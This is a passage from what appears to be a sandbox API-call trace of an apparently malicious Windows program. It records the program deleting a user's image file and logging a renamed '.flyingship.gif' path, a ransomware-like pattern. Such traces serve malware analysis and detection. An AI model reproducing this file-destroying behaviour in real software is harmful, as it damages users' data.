lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.645] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0189.645] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\p8p2fux.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0189.645] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.646] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.646] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0189.646] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.646] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.646] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.646] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.646] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.646] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.646] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.646] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0189.646] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.646] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.647] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.647] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.647] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.647] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.647] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif", lpFilePart=0x0) returned 0x50 [0189.647] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f47ce0, ftCreationTime.dwHighDateTime=0x1d5d9c2, ftLastAccessTime.dwLowDateTime=0xe8598c0, ftLastAccessTime.dwHighDateTime=0x1d5e321, ftLastWriteTime.dwLowDateTime=0x1643ffe0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa5d9, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="P8P2Fux.gif", cAlternateFileName="")) returned 0x90af58 [0189.647] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\p8p2fux.gif")) returned 1 [0189.649] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f47ce0, ftCreationTime.dwHighDateTime=0x1d5d9c2, ftLastAccessTime.dwLowDateTime=0xe8598c0, ftLastAccessTime.dwHighDateTime=0x1d5e321, ftLastWriteTime.dwLowDateTime=0x1643ffe0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa5d9, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="P8P2Fux.gif", cAlternateFileName="")) returned 0 [0189.649] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0189.651] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.652] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0189.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0189.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0189.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0189.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0189.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0189.652] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.652] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0189.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.653] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0189.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.653] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0189.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0189.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.653] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0189.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0189.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.653] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0189.653] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.653] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0189.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0189.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0189.654] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2d2d, lpOverlapped=0x0) returned 1 [0189.654] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0189.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2d2d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0189.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0189.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.flyingship.gif\r\n", cchWideChar=94, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 94 [0189.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5e) returned 0x9a5de0 [0189.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.flyingship.gif\r\n", cchWideChar=94, lpMultiByteStr=0x9a5de0, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.flyingship.gif\r\n", lpUsedDefaultChar=0x0) returned 94 [0189.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0189.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0189.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0189.655] WriteFile (in: hFile=0x158, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x5d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x5d, lpOverlapped=0x0) returned 1 [0189.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0189.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.655] CloseHandle (hObject=0x158) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0189.656] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0189.656] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.658] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0189.658] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.658] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0189.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0189.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0189.658] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0189.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0189.659] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0189.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 